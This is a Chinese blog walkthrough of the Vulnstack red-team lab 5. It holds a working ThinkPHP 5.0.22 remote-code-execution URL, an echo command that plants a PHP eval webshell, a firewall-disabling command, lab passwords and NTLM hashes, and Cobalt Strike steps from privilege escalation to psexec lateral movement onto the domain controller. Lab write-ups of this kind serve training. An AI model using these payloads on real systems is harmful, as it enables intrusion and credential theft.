vulstack红队评估(五)

最新推荐文章于 2024-05-16 12:25:49 发布
最新推荐文章于 2024-05-16 12:25:49 发布
阅读量1k 收藏 1
点赞数 2
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45447309/article/details/106907775
版权

原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13118352.html

 

一、环境搭建:

①根据作者公开的靶机信息整理

虚拟机密码:

Win7:

heart 123.com    #本地管理员用户

sun\Administrator dc123.com    #域管用户,改为了panda123..

 

Win2008:

sun\admin 2020.com    #由于需要改密码,我更改为panda666...

 

②虚拟机网卡设置

Win7双网卡模拟内外网:

外网:桥接模式与物理机相通

内网:根据公开截图是:192.168.138.136,仅主机模式

 利用管理员账号登进win7,并将其中一个网卡ip设置为桥接模式的通网段ip:192.168.1.136

 

Win2008只通内网不通外网:

内网:根据公开截图是:192.168.138.138,仅主机模式

 

③整体环境梳理

靶机:

Win7:192.168.1.136(外网),192.168.138.136(内网)

Win2008:192.168.138.138(内网)

 

攻击机:

kali:192.168.1.2

win10:192.168.1.7

 

利用本地管理员heart登陆win7,并开启phpstudy,启动web环境:

 

二、web层渗透:

0x01 前期信息收集与漏洞利用:

①端口、服务探测:

nmap 192.168.1.136 -T4 -A -sV

 

②初探web

发现开启了80和3306,访问80端口的http服务,发现是thinkphp

 

③thinkphp rce一把梭

随便输入路径,让其报错,发现是5.0.22版本

 

直接去搜索历史漏洞,看下有没有可以直接getshell的,不难找到exp,而且直接RCE了

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

④getshell

然后直接利用echo写入一句话方便后续操作,由于是靶机环境,不考虑免杀,实战中可能需要免杀一句话

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php eval($_POST[cmd]);?^> > shell.php

直接利用蚁剑连接webshell

 

0x02 目标本机信息收集

①发现目标有两个ip,并且存在域sun.com,DNS服务器为192.168.138.138,基本上DNS服务器就是域控

查看进程信息,并没有发现杀软

那么目标肯定是横向移动,最终拿下这台域控了,这里为了熟悉Cobaltstrike,所有的内网渗透操作将利用cs完成,并且不存在杀软,就不用考虑免杀了,毕竟是靶机嘛emmm...

 

三、内网横向渗透

0x01 让目标主机上线

①使用web_delivery的方式,生成powershell命令

 

虚拟终端执行payload

稍等一会就看见cs上线了

 

0x02 提权

①设置心跳时间为1s,查看当前权限为管理员权限,为了后续更好操作,提权至system

②查看补丁情况,并分析可利用漏洞提权exp

shell systeminfo

windows提权辅助脚本提示存在MS15-051

 

③利用CS一键提权

 

提权成功返回一个system权限的beacon

 

0x03 内网横向移动

①查看防火墙情况,发现是开启状态

shell netsh firewall show state

 

为了方便操作,将防火墙关闭

shell netsh advfirewall set allprofiles state off

 

②内网常规信息收集

当前域内计算机列表:

域控列表:

用户列表:

 

③抓取凭证hash

抓取到的全部明文密码、ntlm hash

 

④上线域用户leo

Spawn As派生会话

 

选择leo的凭证

 

成功拿到leo的beacon

 

⑤继续收集域内信息

net user \\192.168.138.138

又发现多了一个admin用户

⑥信息汇总整理:

域名:sun.com

域控:192.168.138.138,机器名:DC

域内机器:192.168.138.136(win7)、192.168.138.138(DC)

所有用户:

非域:heart:123.com;ntlm:afffeba176210fad4628f0524bfe1942

域内用户:sun\administrator(域管):panda123..;ntml:31d6cfe0d16ae931b73c59d7e0c089c0

sun\leo:123.com;ntml:afffeba176210fad4628f0524bfe1942

sun\admin(未知)

krbtgt(未知)

 

0x04 攻击域控

①网络环境分析

边界机win7可通外网、内网,域控只能与win7通信,不能出网,所以想要拿到DC权限,可以通过:

1.psexec配合SMB beacon上线DC机器

2.link Listener+IPC$连接上马

 

②横向psexec拿下DC beacon

 

选择域管凭证,并选择smb beacon的监听器,选择一个会话进行横向移动,点击choose

 

成功利用域管账号拿下DC的smb beacon

③导出域内所有hash

 

四、总结

0x01 总体内网拓扑

 

0x02 整体思路

1.端口探测发现80端口web服务,利用thinkphp 5.0.22 rce漏洞getshell

2.简单主机信息收集发现双网卡,判断存在内网环境,并且有域

3.配合windows检测脚本,判断出可利用exp,并利用cs进行提权

4.内网、域常规信息收集,并关闭了防火墙方便后续操作

5.通过凭证hash获取到域用户、域管、其他用户的密码、hash

6.利用抓取到的域管凭证+psexec进行横向到域控

7.经过分析当前网络情况发现域控并不能出网,所以通过SMB beacon+psexec进行横向,最终拿下域控

m0s30
关注
专栏目录
渗透系列:ATT&CK红队评估(红日靶场二)
weixin_54626591的博客
01-22 229
ATT&CK红队评估(红日靶场二)
ATK&CK1红队评估实战靶场Vulnstack之第二篇web漏洞
千寻的博客
07-21 872
文章目录0x01 信息收集主机探测端口扫描目录浏览0x02 漏洞利用方式一phpmyadmin弱口令+全局日志getshhell第一步 扫描目录第二步 使用弱口令登录第三步 查询全局日志变量配置第四步开启全局日志并修改日志保存位置第步 查询一句话写入日志第六步 连接方式二yxcms任意文件读写,getshell第一步目录扫描发现yxcm和备份文件第二步发现存在信息泄露,泄露口令为弱口令第三步 使用弱口令登录第四步直接在前台模板创建新的模板,内容为一句话木马第步 根据之前下载的备份文件内容,查找出文件路径
vulnstack
干铮的博客
05-30 1278
1.信息收集 主机发现 sudo netdiscover eth0 -r 192.168.31.0/24 端口扫描 nmap -A 192.168.31.57 -p- -sV -oN nmap.a goby漏扫 2.漏洞利用 goby 通用poc写webshell echo ^<?php @eval($_POST['123']) ?^> > #注意”>“字符需要转义 type shell.php 蚁剑连接webshell 3.
vulnstack红队5
Jim2g
07-29 442
1:搭建好靶场 外网 192.168.135.0/24 内网 192.168.138.0/24 2:访问 win7 搭建的网站 3:扫描目录 4:访问下robots.txt 和add.php ,没有太大价值。尝试下暴力破解这个地方。 5:还真跑出来了,字典强大就是好啊 6:这还不简单直接上马getshell 7:上传木马,蚁剑连接 8:看下内网,发下还有一台主机 9:在基本信息里面存在域控域名为sun.com 10:查看域用户权限不够,算了直接搞内网吧 11:用cs生成木马传到主机并且运
渗透靶场--vulnstack-红队评估实战(5)
weixin_45794666的博客
07-20 872
vulnstack-红队评估实战(5) 环境配置 win7 sun\heart 123.com sun\Administrator dc123.com 内网:192.168.138.136 外网:192.168.154.140 启动phpstudy 2008 sun\admin 2021.com 192.168.138.138 kali 192.168.154.129 1.对外网主机进行信息搜集 开放了80和3306,先访问80为thinkphp,通过错误页面得到版本信息5.0.22 搜索
内网之靶场之VulnStack红队
shy的博客
11-13 2339
环境搭建: 外网:192.168.135.0 内网:192.168.138.0 边界机器:win7 外网:192.168.135.150 内网:192.168.138.136 账号: heart 123.com #本地管理员用户 sun\Administrator dc123.com #域管用户 内网机器:winserver 2008 内网:192.168.138.136 账号: sun\admin 2020.com #由于需要改密码,我更改为2020.com1...
记录一次内网渗透过程,ATT&CK实战| VulnStack红队)靶场
weixin_46263525的博客
05-29 494
记录一次内网渗透过程,ATT&CK实战| VulnStack红队)靶场
ATT&CK红队评估(红日靶场
weixin_45682839的博客
04-30 1680
ATT&CK红队评估(红日靶场)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
ATT&CK红队评估(红日靶场二)
weixin_45682839的博客
04-11 2844
靶场搭建 靶场下载地址:漏洞详情 一共有三台主机:WEB、DC、PC WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络 DC主机只有一张网卡,选择和WEB第二章网卡一样的vmnet15网络 PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第二张网卡vmnet15 网络设置完成后进行开机 WEB主机以administrator第一次登录时没
ATT&CK红队评估(红日靶场四)
weixin_45682839的博客
04-28 5575
ATT&CK红队评估(红日靶场四)通关攻略,涉及知识包括: Struts2漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、ms17_010、docker逃逸、ms14_068、ssh密钥利用、流量转发、横向移动、内网渗透等。
红队靶场之VulnStack5红日安全,域横向,移动反弹sehll,thikphpV5.0的RCE漏洞
最新发布
m0_58116751的博客
05-16 1169
远程命令执行是使用此模块的攻击向量的一个很好的例子。再kali上添加socks的代理文件 编辑/etc/proxychains.conf文件,将socks5服务器指向127.0.0.1的1080端口,之后便可以使用proxychains将我们的程序代理进内网了。没关系,既然有了域管理员的密码,我们可以尝试关闭Windows 2008的防火墙。我们systeminfo查看他的一个系统信息,第一次查看无回显之后将蚁剑连接数据删除后再尝试就有回显了可能是一个蚁剑的小问题,多尝试就好了。
红日安全ATT&CK靶机实战系列之vulnstack5
黑白的博客
04-25 5967
typora-root-url: pic 声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet4,192.168.138.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直.
Vulnstack----5、ATT&CK红队评估实战靶场
七天
08-31 2104
域名为sun.com域管理员为Administrator。ping DC$得到域控的IP:192.168.138.138。账号密码:sun\heart 123.com 和 sun\Administrator dc123.com。双网卡,外网ip:192.168.111.129,内网ip:192.168.138.136。模拟外网IP:192.168.111.129(在Win7主机开启IP自动获取)蚁剑执行生成的payload,反弹回一个meterpreter的shell。2.执行whoami。
vulnstack)-红日靶场复现
BuNahua的博客
09-04 3484
说明:关于该复现中的问题欢迎vx交流:Bestboysendit 目录: 一、靶场信息: 二、外网渗透: 方式一: 方式二: 三、内网进攻: 四、痕迹清理: 、参考链接: 一、靶场信息: http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习,此靶场主要用来学习,请大家遵守网络网络安全法。 描述 虚拟机密码
vulnstack靶机实战--红队评估(上)
PigLL的博客
08-20 664
vulnstack靶机实战 1.实验环境: 攻击机:kali(NAT模式) win7:双网卡(WMnet2) (NAT模式) win2008:(WMnet2) win2003:(WMnet2) 使win7与win2008和win2003同在内网当中 并使win7与其他主机可以ping同 其他主机ping win7连接超时 可能因为win7 开启了防火墙 将win7的phpstudy开启 用kali访问win7 分析有phpmyadmin,使用弱口令进行爆破 得知账号密码为root,root 进
vulnstack5靶场笔记
orange777
02-01 2439
红日靶场5
【红日靶场】vulnstack5-完整渗透过程
信安是不可或缺的一部分!
10-20 2313
这个靶场还是比较简单使用cs很快就做完了,其中也发现有一些问题,像是cs插件的开机3389,试了很多次,最后找到原因很多的插件使用的是powershell开启的,但是低版本像2008没有这个,导致无法开启,后面使用注册表开启才行。
Vulnstack靶场实战(一)
weixin_46066840的博客
09-13 1559
红日安全实战:Vulnstack靶场实战(一)
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
ATT\\\\&CK红队评估实战靶场
08-16
我很抱歉,但是我无法回答你的问题。可能是因为你提供的引用内容与你的问题不相关。请提供更具体的问题,我会尽力回答。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Windows系统——ATT&CK红队评估实战靶场(二)——CS方式](https://blog.csdn.net/qq_44029310/article/details/126039321)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK红队评估实战靶场(二)](https://blog.csdn.net/qq_53263789/article/details/115282950)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值